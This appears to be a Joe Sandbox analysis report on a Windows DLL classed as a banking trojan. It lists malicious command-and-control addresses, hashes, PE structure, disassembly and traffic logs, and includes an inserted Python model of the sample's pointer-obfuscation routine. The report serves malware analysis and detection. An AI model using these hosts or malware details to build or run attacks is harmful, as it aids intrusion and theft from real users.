                        https://45.77.0.96/loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://192.46.210.220/%Evloaddll32.exe, 00000000.00000003.436575966.000000000166B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/rSloaddll32.exe, 00000000.00000003.750936613.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://185.56.219.47:8116/ploaddll32.exe, 00000000.00000003.708727054.00000000016DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/h.dllloaddll32.exe, 00000000.00000003.604985676.0000000001672000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/coro8loaddll32.exe, 00000000.00000003.521947137.000000000166E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/6/loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://18192.46.210.220/loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.641039934.00000000016DB000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.77.0.96 | unknown | United States | 20473 | AS-CHOOPAUS | true
185.56.219.47 | unknown | Italy | 202675 | KELIWEBIT | true
192.46.210.220 | unknown | United States | 5501 | FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGe | true
143.244.140.214 | unknown | United States | 174 | COGENT-174US | true

                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510685
Start date: 28.10.2021
Start time: 04:48:56
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 11s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Variant.Razy.980776.28061.5528 (renamed file extension from 5528 to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.bank.troj.evad.winDLL@11/2@0/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.3% (good quality ratio 12.3%)
• Quality average: 78.4%
• Quality standard deviation: 16%
HCA Information:
• Successful, ratio: 65%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Override analysis time to 240s for rundll32
Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 173.222.108.210, 173.222.108.226, 20.50.102.62, 20.82.209.183, 80.67.82.211, 80.67.82.235, 40.112.88.60, 40.91.112.76, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateKey calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

Time | Type | Description
04:50:54 | API Interceptor | 184x Sleep call for process: rundll32.exe modified
04:51:00 | API Interceptor | 178x Sleep call for process: loaddll32.exe modified

                        Joe Sandbox View / Context

                        IPs

Match | Associated Sample Name / URL | Detection
45.77.0.96:
  SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.17887.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.9354.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.302.dll | malicious
185.56.219.47:
  SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.17887.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.9354.dll | malicious
  SecuriteInfo.com.Variant.Razy.980776.302.dll | malicious

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.17887.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.9354.dll | malicious | 185.56.219.47
KELIWEBIT | SecuriteInfo.com.Variant.Razy.980776.302.dll | malicious | 185.56.219.47
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.17887.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.9354.dll | malicious | 45.77.0.96
AS-CHOOPAUS | SecuriteInfo.com.Variant.Razy.980776.302.dll | malicious | 45.77.0.96

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.25006.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.28328.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.4470.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.14159.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.20807.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.27063.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.2260.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.12452.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.6851.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.2379.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.10617.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.24814.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.29553.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.15127.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.28360.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.19796.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.9816.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.17887.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.9354.dll | malicious | 192.46.210.220
51c64c77e60f3980eea90869b68c58a8 | SecuriteInfo.com.Variant.Razy.980776.302.dll | malicious | 192.46.210.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: Microsoft Cabinet archive data, 61157 bytes, 1 file
Category: dropped
Size (bytes): 61157
Entropy (8bit): 7.995991509218449
Encrypted: true
SSDEEP: 1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
MD5: AB5C36D10261C173C5896F3478CDC6B7
SHA1: 87AC53810AD125663519E944BC87DED3979CBEE4
SHA-256: F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
SHA-512: E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
Malicious: false
Reputation: moderate, very likely benign file
Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\SysWOW64\rundll32.exe
File Type: data
Category: modified
Size (bytes): 326
Entropy (8bit): 3.0984691064611756
Encrypted: false
SSDEEP: 6:kKcdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:22kPlE99SNxAhUefit
MD5: 230B717FEEB155055342D4E745CFED8E
SHA1: E1F319562B57775E5A7775E27EC5D1F60FBE88AA
SHA-256: F83B8CEE295031E6E80BBECBB738C33DD35A330F7F1933F46E58154CD6790A40
SHA-512: 8E433867BF3AA2EBCADF471852663218601553E4B9F113B2015FAA9418BC6672E7D8BEDFE8A6187C0071F9C2BE101DD92EA44523CE517A1DC90377C513F2365E
Malicious: false
Reputation: low
Preview: p...... ...........Z....(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.439684554814386
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Variant.Razy.980776.28061.dll
File size: 1375232
MD5: e2ba080ddec587a157309bdf0a5442ce
SHA1: 62edb669f364788f1a95fd59d41efbb3df1e0dfb
SHA256: a4a8b8ef4a801ff1abb10be76c32881cf9adb4f6a784ad0e84e65d55ed1cf7ca
SHA512: 7903cbb3138a5769c104e1cb476ff4fb1599b2c9c8e829f34a02abf701c4cf613fa24f7a1cdfbd2b6ba07369b30fc08b21dec0bc1204d92a92f359c190f3c4a5
SSDEEP: 24576:rnxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7r:rcfk82uAJTI7LPswKwu6
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............tL..tL..tL^..L..tL...L..tL..vM..tL..qM..tL..wM..tL..rM..tL^..L..tL..uL..tL..{Mo.tL..uM..tL...L..tL..wM..tLRich..tL.......

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x4336b0
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5BBD629D [Wed Oct 10 02:23:25 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: ccbe70d6d0d02f6248ca160d6a0bb85b

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F51FC9AFEB7h
call 00007F51FC9B0BE7h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007F51FC9AFCA6h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
mov eax, dword ptr [0054806Ch]
xor edx, edx
mov ecx, 00000020h
div ecx
push edx
mov edx, dword ptr [ebp+08h]
xor edx, dword ptr [0054806Ch]
push edx
call 00007F51FC9AFEF4h
add esp, 08h
pop ebp
ret
int3
int3
int3
int3
int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [0054806Ch]
                                                                                                        xor edx, edx
                                                                                                        mov ecx, 00000020h
                                                                                                        div ecx
                                                                                                        mov eax, 00000020h
                                                                                                        sub eax, edx
                                                                                                        push eax
                                                                                                        mov ecx, dword ptr [ebp+08h]
                                                                                                        push ecx
                                                                                                        call 00007F51FC9AFEC3h
                                                                                                        add esp, 08h
                                                                                                        xor eax, dword ptr [0054806Ch]
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                                        mov ecx, dword ptr [ebp+0Ch]
                                                                                                        ror eax, cl
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        call 00007F51FC9B124Dh
                                                                                                        push eax
                                                                                                        call 00007F51FC9F1F57h
                                                                                                        add esp, 04h
                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]
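The two routines above that read the global at 0054806Ch form an encode/decode pair: the first XORs its argument with the global and rotates by (global mod 32), the second rotates by 32 - (global mod 32) and XORs afterwards. The Python model below is an added example written from those instructions; it is not output of the sandbox and not code recovered from the sample. It assumes that both `call` instructions reach the `ror eax, cl` routine shown after them (the listing prints displacement-style targets, not the resolved callee), and it names the global COOKIE only for readability.

```python
# Added example: Python model of the two [0054806Ch]-reading routines in the
# listing above.  "cookie" stands for the 32-bit global at 0054806Ch; the name
# is an illustrative assumption, the report only shows the address.
MASK32 = 0xFFFFFFFF


def ror32(value, count):
    """'ror eax, cl' as the CPU executes it: the count is masked to 5 bits,
    so a count of 32 rotates by 0."""
    count &= 0x1F
    return ((value >> count) | (value << (32 - count))) & MASK32


def encode_pointer(ptr, cookie):
    """First routine: edx = cookie mod 32, then ror(ptr ^ cookie, edx)."""
    shift = cookie % 0x20                     # xor edx,edx / mov ecx,20h / div ecx
    return ror32((ptr ^ cookie) & MASK32, shift)


def decode_pointer(enc, cookie):
    """Second routine: ror(enc, 32 - cookie mod 32), then xor with cookie.
    Rotating right by 32 - n is rotating left by n, which undoes encode_pointer."""
    shift = 0x20 - cookie % 0x20              # mov eax,20h / sub eax,edx
    return (ror32(enc, shift) ^ cookie) & MASK32


def roundtrip(ptr, cookie):
    """decode(encode(ptr)) must give ptr back for every cookie value."""
    return decode_pointer(encode_pointer(ptr, cookie), cookie)


if __name__ == "__main__":
    # Constructed inputs: the Bluewing export address listed in this report
    # as the pointer, and an arbitrary cookie value.
    ptr, cookie = 0x0049EED0, 0xBB40E64E
    enc = encode_pointer(ptr, cookie)
    print(f"ptr={ptr:#010x} cookie={cookie:#010x} -> enc={enc:#010x}")
    assert roundtrip(ptr, cookie) == ptr
    # Degenerate cookies: 0 leaves the pointer in the clear, and any cookie
    # that is a multiple of 32 reduces the scheme to a bare XOR.
    assert encode_pointer(ptr, 0) == ptr
    assert encode_pointer(ptr, 0x20) == ptr ^ 0x20
```

The degenerate cases at the end are worth keeping in mind when reading a memory dump: the strength of this obfuscation rests entirely on the global being unpredictable, and a cookie whose low five bits are zero leaves nothing but an XOR.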

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x147190         0x6c          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x1471fc         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x15c000         0x72b4        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x143110         0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x143168         0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc7000          0x184         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                                    Entropy        Characteristics
.text   0x1000           0xc5e2f       0xc6000   False     0.442065922901   data                                         6.47812636882  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xc7000          0x80aec       0x80c00   False     0.534103837985   data                                         5.52053058147  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x148000         0x13ba0       0x1800    False     0.1875           DOS executable (block device driverpyright)  3.99635070896  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0x15c000         0x72b4        0x7400    False     0.710264008621   data                                         6.69742088731  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL           Import
KERNEL32.dll  GetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

Exports

Name        Ordinal  Address
Bluewing    1        0x49eed0
Earth       2        0x49efd0
Masterjust  3        0x49eb20

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 28, 2021 04:50:53.132839918 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:53.132898092 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:53.132992983 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:53.611660957 CEST  49748        443        192.168.2.5      192.46.210.220
Oct 28, 2021 04:50:53.611677885 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:54.113028049 CEST  443          49748      192.46.210.220   192.168.2.5
Oct 28, 2021 04:50:54.113159895 CEST  49748        443        192.168.2.5      192.46.210.220
